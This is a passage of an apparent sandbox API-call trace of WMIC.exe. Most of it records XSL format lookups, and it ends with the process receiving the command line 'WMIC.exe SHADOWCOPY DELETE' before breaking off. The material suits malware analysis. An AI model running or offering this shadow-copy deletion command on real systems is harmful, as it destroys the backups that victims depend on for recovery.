(_Size=0xc) returned 0x2bbacb0 [0251.580] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.580] SysStringLen (param_1="TABLE") returned 0x5 [0251.580] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.580] SysStringLen (param_1="VALUE") returned 0x5 [0251.580] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.580] SysStringLen (param_1="XML") returned 0x3 [0251.580] SysStringLen (param_1="XML") returned 0x3 [0251.580] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.580] malloc (_Size=0x18) returned 0x2bb2b48 [0251.580] IUnknown:Release (This=0x2dd6b88) returned 0x0 [0251.580] IUnknown:Release (This=0x2dd9fa8) returned 0x0 [0251.580] IUnknown:Release (This=0x2dd9ff8) returned 0x0 [0251.580] IXMLDOMNodeList:get_item (in: This=0x2dd9ca0, index=10, listItem=0x87f8a8 | out: listItem=0x87f8a8*=0x2dd6b88) returned 0x0 [0251.580] IXMLDOMNode:get_text (in: This=0x2dd6b88, text=0x87f8ac | out: text=0x87f8ac*="texttable.xsl") returned 0x0 [0251.580] IXMLDOMNode:get_attributes (in: This=0x2dd6b88, attributeMap=0x87f8a4 | out: attributeMap=0x87f8a4*=0x2dd9fa8) returned 0x0 [0251.580] malloc (_Size=0xc) returned 0x2bbaad0 [0251.580] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2dd9fa8, name="KEYWORD", namedItem=0x87f8a0 | out: namedItem=0x87f8a0*=0x2dd9ff8) returned 0x0 [0251.580] free (_Block=0x2bbaad0) [0251.581] IXMLDOMNode:get_nodeValue (in: This=0x2dd9ff8, value=0x87f860 | out: value=0x87f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0251.581] malloc (_Size=0xc) returned 0x2bbad58 [0251.581] malloc (_Size=0xc) returned 0x2bbaaa0 [0251.581] SysStringLen (param_1="texttablewsys") returned 0xd [0251.581] SysStringLen (param_1="TABLE") returned 0x5 [0251.581] SysStringLen (param_1="texttablewsys") returned 0xd [0251.581] SysStringLen (param_1="XML") returned 0x3 [0251.581] SysStringLen (param_1="texttablewsys") returned 0xd [0251.581] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.581] SysStringLen (param_1="XML") returned 0x3 [0251.581] SysStringLen (param_1="texttablewsys") returned 0xd [0251.581] malloc (_Size=0x18) returned 0x2bb2be8 [0251.581] IUnknown:Release (This=0x2dd6b88) returned 0x0 [0251.581] IUnknown:Release (This=0x2dd9fa8) returned 0x0 [0251.581] IUnknown:Release (This=0x2dd9ff8) returned 0x0 [0251.581] IXMLDOMNodeList:get_item (in: This=0x2dd9ca0, index=11, listItem=0x87f8a8 | out: listItem=0x87f8a8*=0x2dd6b88) returned 0x0 [0251.581] IXMLDOMNode:get_text (in: This=0x2dd6b88, text=0x87f8ac | out: text=0x87f8ac*="texttable.xsl") returned 0x0 [0251.581] IXMLDOMNode:get_attributes (in: This=0x2dd6b88, attributeMap=0x87f8a4 | out: attributeMap=0x87f8a4*=0x2dd9fa8) returned 0x0 [0251.581] malloc (_Size=0xc) returned 0x2bbacf8 [0251.581] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2dd9fa8, name="KEYWORD", namedItem=0x87f8a0 | out: namedItem=0x87f8a0*=0x2dd9ff8) returned 0x0 [0251.581] free (_Block=0x2bbacf8) [0251.582] IXMLDOMNode:get_nodeValue (in: This=0x2dd9ff8, value=0x87f860 | out: value=0x87f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0251.582] malloc (_Size=0xc) returned 0x2bbab78 [0251.582] malloc (_Size=0xc) returned 0x2bbad10 [0251.582] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.582] SysStringLen (param_1="TABLE") returned 0x5 [0251.582] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.582] SysStringLen (param_1="XML") returned 0x3 [0251.582] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.582] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.582] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.582] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.582] malloc (_Size=0x18) returned 0x2bb2c08 [0251.582] IUnknown:Release (This=0x2dd6b88) returned 0x0 [0251.582] IUnknown:Release (This=0x2dd9fa8) returned 0x0 [0251.582] IUnknown:Release (This=0x2dd9ff8) returned 0x0 [0251.582] IXMLDOMNodeList:get_item (in: This=0x2dd9ca0, index=12, listItem=0x87f8a8 | out: listItem=0x87f8a8*=0x2dd6b88) returned 0x0 [0251.582] IXMLDOMNode:get_text (in: This=0x2dd6b88, text=0x87f8ac | out: text=0x87f8ac*="texttable.xsl") returned 0x0 [0251.582] IXMLDOMNode:get_attributes (in: This=0x2dd6b88, attributeMap=0x87f8a4 | out: attributeMap=0x87f8a4*=0x2dd9fa8) returned 0x0 [0251.582] malloc (_Size=0xc) returned 0x2bbaa88 [0251.582] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2dd9fa8, name="KEYWORD", namedItem=0x87f8a0 | out: namedItem=0x87f8a0*=0x2dd9ff8) returned 0x0 [0251.582] free (_Block=0x2bbaa88) [0251.583] IXMLDOMNode:get_nodeValue (in: This=0x2dd9ff8, value=0x87f860 | out: value=0x87f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0251.583] malloc (_Size=0xc) returned 0x2bbad40 [0251.583] malloc (_Size=0xc) returned 0x2bbacf8 [0251.583] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0251.583] SysStringLen (param_1="TABLE") returned 0x5 [0251.583] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0251.583] SysStringLen (param_1="XML") returned 0x3 [0251.583] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0251.583] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.583] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0251.583] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.583] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.583] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0251.583] malloc (_Size=0x18) returned 0x2bb2ae8 [0251.583] IUnknown:Release (This=0x2dd6b88) returned 0x0 [0251.583] IUnknown:Release (This=0x2dd9fa8) returned 0x0 [0251.583] IUnknown:Release (This=0x2dd9ff8) returned 0x0 [0251.583] IXMLDOMNodeList:get_item (in: This=0x2dd9ca0, index=13, listItem=0x87f8a8 | out: listItem=0x87f8a8*=0x2dd6b88) returned 0x0 [0251.583] IXMLDOMNode:get_text (in: This=0x2dd6b88, text=0x87f8ac | out: text=0x87f8ac*="texttable.xsl") returned 0x0 [0251.583] IXMLDOMNode:get_attributes (in: This=0x2dd6b88, attributeMap=0x87f8a4 | out: attributeMap=0x87f8a4*=0x2dd9fa8) returned 0x0 [0251.583] malloc (_Size=0xc) returned 0x2bbac38 [0251.583] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2dd9fa8, name="KEYWORD", namedItem=0x87f8a0 | out: namedItem=0x87f8a0*=0x2dd9ff8) returned 0x0 [0251.584] free (_Block=0x2bbac38) [0251.584] IXMLDOMNode:get_nodeValue (in: This=0x2dd9ff8, value=0x87f860 | out: value=0x87f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0251.584] malloc (_Size=0xc) returned 0x2bbab90 [0251.584] malloc (_Size=0xc) returned 0x2bbac50 [0251.584] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0251.584] SysStringLen (param_1="TABLE") returned 0x5 [0251.584] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0251.584] SysStringLen (param_1="XML") returned 0x3 [0251.584] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0251.584] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.584] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0251.584] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.584] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.584] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0251.584] malloc (_Size=0x18) returned 0x2bb2948 [0251.585] IUnknown:Release (This=0x2dd6b88) returned 0x0 [0251.585] IUnknown:Release (This=0x2dd9fa8) returned 0x0 [0251.585] IUnknown:Release (This=0x2dd9ff8) returned 0x0 [0251.585] IXMLDOMNodeList:get_item (in: This=0x2dd9ca0, index=14, listItem=0x87f8a8 | out: listItem=0x87f8a8*=0x2dd6b88) returned 0x0 [0251.585] IXMLDOMNode:get_text (in: This=0x2dd6b88, text=0x87f8ac | out: text=0x87f8ac*="texttable.xsl") returned 0x0 [0251.585] IXMLDOMNode:get_attributes (in: This=0x2dd6b88, attributeMap=0x87f8a4 | out: attributeMap=0x87f8a4*=0x2dd9fa8) returned 0x0 [0251.585] malloc (_Size=0xc) returned 0x2bbad28 [0251.585] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2dd9fa8, name="KEYWORD", namedItem=0x87f8a0 | out: namedItem=0x87f8a0*=0x2dd9ff8) returned 0x0 [0251.585] free (_Block=0x2bbad28) [0251.585] IXMLDOMNode:get_nodeValue (in: This=0x2dd9ff8, value=0x87f860 | out: value=0x87f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0251.585] malloc (_Size=0xc) returned 0x2bbabf0 [0251.585] malloc (_Size=0xc) returned 0x2bbaab8 [0251.586] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0251.586] SysStringLen (param_1="TABLE") returned 0x5 [0251.586] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0251.586] SysStringLen (param_1="XML") returned 0x3 [0251.586] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0251.586] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.586] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0251.586] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.586] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0251.586] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0251.586] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.586] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0251.586] malloc (_Size=0x18) returned 0x2bb2c28 [0251.586] IUnknown:Release (This=0x2dd6b88) returned 0x0 [0251.586] IUnknown:Release (This=0x2dd9fa8) returned 0x0 [0251.586] IUnknown:Release (This=0x2dd9ff8) returned 0x0 [0251.586] IXMLDOMNodeList:get_item (in: This=0x2dd9ca0, index=15, listItem=0x87f8a8 | out: listItem=0x87f8a8*=0x2dd6b88) returned 0x0 [0251.586] IXMLDOMNode:get_text (in: This=0x2dd6b88, text=0x87f8ac | out: text=0x87f8ac*="htable.xsl") returned 0x0 [0251.586] IXMLDOMNode:get_attributes (in: This=0x2dd6b88, attributeMap=0x87f8a4 | out: attributeMap=0x87f8a4*=0x2dd9fa8) returned 0x0 [0251.586] malloc (_Size=0xc) returned 0x2bbad70 [0251.586] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2dd9fa8, name="KEYWORD", namedItem=0x87f8a0 | out: namedItem=0x87f8a0*=0x2dd9ff8) returned 0x0 [0251.586] free (_Block=0x2bbad70) [0251.586] IXMLDOMNode:get_nodeValue (in: This=0x2dd9ff8, value=0x87f860 | out: value=0x87f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0251.587] malloc (_Size=0xc) returned 0x2bbac08 [0251.587] malloc (_Size=0xc) returned 0x2bbad28 [0251.587] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0251.587] SysStringLen (param_1="TABLE") returned 0x5 [0251.587] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0251.587] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.587] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0251.587] SysStringLen (param_1="XML") returned 0x3 [0251.587] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0251.587] SysStringLen (param_1="texttablewsys") returned 0xd [0251.587] SysStringLen (param_1="XML") returned 0x3 [0251.587] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0251.587] malloc (_Size=0x18) returned 0x2bb29a8 [0251.587] IUnknown:Release (This=0x2dd6b88) returned 0x0 [0251.587] IUnknown:Release (This=0x2dd9fa8) returned 0x0 [0251.587] IUnknown:Release (This=0x2dd9ff8) returned 0x0 [0251.587] IXMLDOMNodeList:get_item (in: This=0x2dd9ca0, index=16, listItem=0x87f8a8 | out: listItem=0x87f8a8*=0x2dd6b88) returned 0x0 [0251.587] IXMLDOMNode:get_text (in: This=0x2dd6b88, text=0x87f8ac | out: text=0x87f8ac*="htable.xsl") returned 0x0 [0251.587] IXMLDOMNode:get_attributes (in: This=0x2dd6b88, attributeMap=0x87f8a4 | out: attributeMap=0x87f8a4*=0x2dd9fa8) returned 0x0 [0251.587] malloc (_Size=0xc) returned 0x2bbaad0 [0251.587] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2dd9fa8, name="KEYWORD", namedItem=0x87f8a0 | out: namedItem=0x87f8a0*=0x2dd9ff8) returned 0x0 [0251.588] free (_Block=0x2bbaad0) [0251.588] IXMLDOMNode:get_nodeValue (in: This=0x2dd9ff8, value=0x87f860 | out: value=0x87f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0251.588] malloc (_Size=0xc) returned 0x2bbaa88 [0251.588] malloc (_Size=0xc) returned 0x2bbac80 [0251.588] SysStringLen (param_1="htable-sortby") returned 0xd [0251.588] SysStringLen (param_1="TABLE") returned 0x5 [0251.588] SysStringLen (param_1="htable-sortby") returned 0xd [0251.588] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.588] SysStringLen (param_1="htable-sortby") returned 0xd [0251.588] SysStringLen (param_1="XML") returned 0x3 [0251.588] SysStringLen (param_1="htable-sortby") returned 0xd [0251.588] SysStringLen (param_1="texttablewsys") returned 0xd [0251.588] SysStringLen (param_1="htable-sortby") returned 0xd [0251.588] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0251.588] SysStringLen (param_1="XML") returned 0x3 [0251.588] SysStringLen (param_1="htable-sortby") returned 0xd [0251.588] malloc (_Size=0x18) returned 0x2bb2988 [0251.588] IUnknown:Release (This=0x2dd6b88) returned 0x0 [0251.588] IUnknown:Release (This=0x2dd9fa8) returned 0x0 [0251.588] IUnknown:Release (This=0x2dd9ff8) returned 0x0 [0251.588] IXMLDOMNodeList:get_item (in: This=0x2dd9ca0, index=17, listItem=0x87f8a8 | out: listItem=0x87f8a8*=0x2dd6b88) returned 0x0 [0251.588] IXMLDOMNode:get_text (in: This=0x2dd6b88, text=0x87f8ac | out: text=0x87f8ac*="mof.xsl") returned 0x0 [0251.588] IXMLDOMNode:get_attributes (in: This=0x2dd6b88, attributeMap=0x87f8a4 | out: attributeMap=0x87f8a4*=0x2dd9fa8) returned 0x0 [0251.588] malloc (_Size=0xc) returned 0x2bbad70 [0251.589] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2dd9fa8, name="KEYWORD", namedItem=0x87f8a0 | out: namedItem=0x87f8a0*=0x2dd9ff8) returned 0x0 [0251.589] free (_Block=0x2bbad70) [0251.589] IXMLDOMNode:get_nodeValue (in: This=0x2dd9ff8, value=0x87f860 | out: value=0x87f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0251.589] malloc (_Size=0xc) returned 0x2bbac98 [0251.589] malloc (_Size=0xc) returned 0x2bbab48 [0251.589] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0251.589] SysStringLen (param_1="TABLE") returned 0x5 [0251.589] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0251.589] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.589] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0251.589] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.589] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0251.589] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0251.589] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.589] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0251.589] malloc (_Size=0x18) returned 0x2bb2a28 [0251.589] IUnknown:Release (This=0x2dd6b88) returned 0x0 [0251.589] IUnknown:Release (This=0x2dd9fa8) returned 0x0 [0251.589] IUnknown:Release (This=0x2dd9ff8) returned 0x0 [0251.589] IXMLDOMNodeList:get_item (in: This=0x2dd9ca0, index=18, listItem=0x87f8a8 | out: listItem=0x87f8a8*=0x2dd6b88) returned 0x0 [0251.589] IXMLDOMNode:get_text (in: This=0x2dd6b88, text=0x87f8ac | out: text=0x87f8ac*="mof.xsl") returned 0x0 [0251.589] IXMLDOMNode:get_attributes (in: This=0x2dd6b88, attributeMap=0x87f8a4 | out: attributeMap=0x87f8a4*=0x2dd9fa8) returned 0x0 [0251.590] malloc (_Size=0xc) returned 0x2bbab00 [0251.590] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2dd9fa8, name="KEYWORD", namedItem=0x87f8a0 | out: namedItem=0x87f8a0*=0x2dd9ff8) returned 0x0 [0251.590] free (_Block=0x2bbab00) [0251.590] IXMLDOMNode:get_nodeValue (in: This=0x2dd9ff8, value=0x87f860 | out: value=0x87f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0251.590] malloc (_Size=0xc) returned 0x2bbacc8 [0251.590] malloc (_Size=0xc) returned 0x2bbab18 [0251.590] SysStringLen (param_1="wmiclimofformat") returned 0xf [0251.590] SysStringLen (param_1="TABLE") returned 0x5 [0251.590] SysStringLen (param_1="wmiclimofformat") returned 0xf [0251.590] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.590] SysStringLen (param_1="wmiclimofformat") returned 0xf [0251.590] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.590] SysStringLen (param_1="wmiclimofformat") returned 0xf [0251.590] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0251.590] SysStringLen (param_1="wmiclimofformat") returned 0xf [0251.590] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0251.590] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.590] SysStringLen (param_1="wmiclimofformat") returned 0xf [0251.590] malloc (_Size=0x18) returned 0x2bb2b08 [0251.590] IUnknown:Release (This=0x2dd6b88) returned 0x0 [0251.590] IUnknown:Release (This=0x2dd9fa8) returned 0x0 [0251.590] IUnknown:Release (This=0x2dd9ff8) returned 0x0 [0251.590] IXMLDOMNodeList:get_item (in: This=0x2dd9ca0, index=19, listItem=0x87f8a8 | out: listItem=0x87f8a8*=0x2dd6b88) returned 0x0 [0251.591] IXMLDOMNode:get_text (in: This=0x2dd6b88, text=0x87f8ac | out: text=0x87f8ac*="textvaluelist.xsl") returned 0x0 [0251.591] IXMLDOMNode:get_attributes (in: This=0x2dd6b88, attributeMap=0x87f8a4 | out: attributeMap=0x87f8a4*=0x2dd9fa8) returned 0x0 [0251.591] malloc (_Size=0xc) returned 0x2bbad70 [0251.591] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2dd9fa8, name="KEYWORD", namedItem=0x87f8a0 | out: namedItem=0x87f8a0*=0x2dd9ff8) returned 0x0 [0251.591] free (_Block=0x2bbad70) [0251.591] IXMLDOMNode:get_nodeValue (in: This=0x2dd9ff8, value=0x87f860 | out: value=0x87f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0251.591] malloc (_Size=0xc) returned 0x2bbad70 [0251.591] malloc (_Size=0xc) returned 0x2bbaba8 [0251.591] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0251.591] SysStringLen (param_1="TABLE") returned 0x5 [0251.591] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0251.591] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.591] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0251.591] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.591] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0251.591] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0251.591] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0251.591] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0251.591] malloc (_Size=0x18) returned 0x2bb2c68 [0251.591] IUnknown:Release (This=0x2dd6b88) returned 0x0 [0251.591] IUnknown:Release (This=0x2dd9fa8) returned 0x0 [0251.592] IUnknown:Release (This=0x2dd9ff8) returned 0x0 [0251.592] IXMLDOMNodeList:get_item (in: This=0x2dd9ca0, index=20, listItem=0x87f8a8 | out: listItem=0x87f8a8*=0x2dd6b88) returned 0x0 [0251.592] IXMLDOMNode:get_text (in: This=0x2dd6b88, text=0x87f8ac | out: text=0x87f8ac*="textvaluelist.xsl") returned 0x0 [0251.592] IXMLDOMNode:get_attributes (in: This=0x2dd6b88, attributeMap=0x87f8a4 | out: attributeMap=0x87f8a4*=0x2dd9fa8) returned 0x0 [0251.592] malloc (_Size=0xc) returned 0x2bbace0 [0251.592] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2dd9fa8, name="KEYWORD", namedItem=0x87f8a0 | out: namedItem=0x87f8a0*=0x2dd9ff8) returned 0x0 [0251.592] free (_Block=0x2bbace0) [0251.592] IXMLDOMNode:get_nodeValue (in: This=0x2dd9ff8, value=0x87f860 | out: value=0x87f860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0251.592] malloc (_Size=0xc) returned 0x2bbabc0 [0251.592] malloc (_Size=0xc) returned 0x2bbace0 [0251.592] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0251.592] SysStringLen (param_1="TABLE") returned 0x5 [0251.592] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0251.592] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0251.592] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0251.592] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0251.592] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0251.592] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0251.592] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0251.592] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0251.592] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0251.592] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0251.593] malloc (_Size=0x18) returned 0x2bb29e8 [0251.593] IUnknown:Release (This=0x2dd6b88) returned 0x0 [0251.593] IUnknown:Release (This=0x2dd9fa8) returned 0x0 [0251.593] IUnknown:Release (This=0x2dd9ff8) returned 0x0 [0251.593] IUnknown:Release (This=0x2dd9ca0) returned 0x0 [0251.593] FreeThreadedDOMDocument:IUnknown:Release (This=0x2dd6b48) returned 0x1 [0251.593] FreeThreadedDOMDocument:IUnknown:Release (This=0x2dd45a8) returned 0x0 [0251.593] free (_Block=0x2bb9988) [0251.593] GetCommandLineW () returned="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" SHADOWCOPY DELETE" [0251.593] malloc (_Size=0x70) returned 0x2bbae60 [0251.593] memcpy_s (in: _Destination=0x2bbae60, _DestinationSize=0x6e, _Source=0x2e71b78, _SourceSize=0x6a | out: _Destination=0x2bbae60) returned 0x0 [0251.593] malloc (_Size=0xc) returned 0x2bbac20 [0251.593] malloc (_Size=0xc) returned 0x2bbabd8 [0251.593] malloc (_Size=0xc) returned 0x2bbaad0 [0251.593] malloc (_Size=0xc) returned 0x2bbac38 [0251.593] malloc (_Size=0x80) returned 0x2bbaed8 [0251.594] GetLocalTime (in: lpSystemTime=0x87f844 | out: lpSystemTime=0x87f844*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x2, wHour=0x8, wMinute=0x1c, wSecond=0x11, wMilliseconds=0x281)) [0251.594] _vsnwprintf (in: _Buffer=0x2bbaed8, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x87f824 | out: _Buffer="04-02-2020T08:28:17") returned 19 [0251.594] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 18 [0251.594] malloc (_Size=0x26) returned 0x2bb9da8 [0251.594] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 18 [0251.594] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 18 [0251.594] malloc (_Size=0x26) returned 0x2bb0568 [0251.594] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 18 [0251.594] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 18 [0251.594] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 18 [0251.594] malloc (_Size=0x16) returned 0x2bb2a08 [0251.594] lstrlenW (lpString="SHADOWCOPY") returned 10 [0251.594] _wcsicmp (_String1="SHADOWCOPY", _String2="\"NULL\"") returned 81 [0251.594] malloc (_Size=0x16) returned 0x2bb2b88 [0251.594] malloc (_Size=0x4) returned 0x2bb0598 [0251.594] free (_Block=0x0) [0251.594] free (_Block=0x2bb2a08) [0251.594] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 18 [0251.594] malloc (_Size=0xe) returned 0x2bbab00 [0251.594] lstrlenW (lpString="DELETE") returned 6 [0251.594] _wcsicmp (_String1="DELETE", _String2="\"NULL\"") returned 66 [0251.594] malloc (_Size=0xe) returned 0x2bbac68 [0251.594] malloc (_Size=0x8) returned 0x2bbaf60 [0251.594] memmove_s (in: _Destination=0x2bbaf60, _DestinationSize=0x4, _Source=0x2bb0598, _SourceSize=0x4 | out: _Destination=0x2bbaf60) returned 0x0 [0251.594] free (_Block=0x2bb0598) [0251.594] free (_Block=0x0) [0251.594] free (_Block=0x2bbab00) [0251.594] malloc (_Size=0x8) returned 0x2bb0598 [0251.594] lstrlenW (lpString="QUIT") returned 4 [0251.594] lstrlenW (lpString="SHADOWCOPY") returned 10 [0251.595] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0251.595] lstrlenW (lpString="EXIT") returned 4 [0251.595] lstrlenW (lpString="SHADOWCOPY") returned 10 [0251.595] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0251.595] free (_Block=0x2bb0598) [0251.595] WbemLocator:IUnknown:AddRef (This=0x2e84840) returned 0x2 [0251.595] malloc (_Size=0x8) returned 0x2bb0598 [0251.595] lstrlenW (lpString="/") returned 1 [0251.595] lstrlenW (lpString="SHADOWCOPY") returned 10 [0251.595] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0251.595] lstrlenW (lpString="-") returned 1 [0251.595] lstrlenW (lpString="SHADOWCOPY") returned 10 [0251.595] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0251.595] lstrlenW (lpString="CLASS") returned 5 [0251.595] lstrlenW (lpString="SHADOWCOPY") returned 10 [0251.595] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0251.595] lstrlenW (lpString="PATH") returned 4 [0251.595] lstrlenW (lpString="SHADOWCOPY") returned 10 [0251.595] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0251.595] lstrlenW (lpString="CONTEXT") returned 7 [0251.595] lstrlenW (lpString="SHADOWCOPY") returned 10 [0251.595] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0251.595] lstrlenW (lpString="SHADOWCOPY") returned 10 [0251.595] malloc (_Size=0x16) returned 0x2bb2a48 [0251.595] lstrlenW (lpString="SHADOWCOPY") returned 10 [0251.595] GetCurrentThreadId () returned 0x1298 [0251.595] ??0CHString@@QAE@XZ () returned 0x87f79c [0251.595] malloc (_Size=0xc) returned 0x2bbaae8 [0251.595] malloc (_Size=0xc) returned 0x2bbab00 [0251.596] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2e84840, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68540 | out: 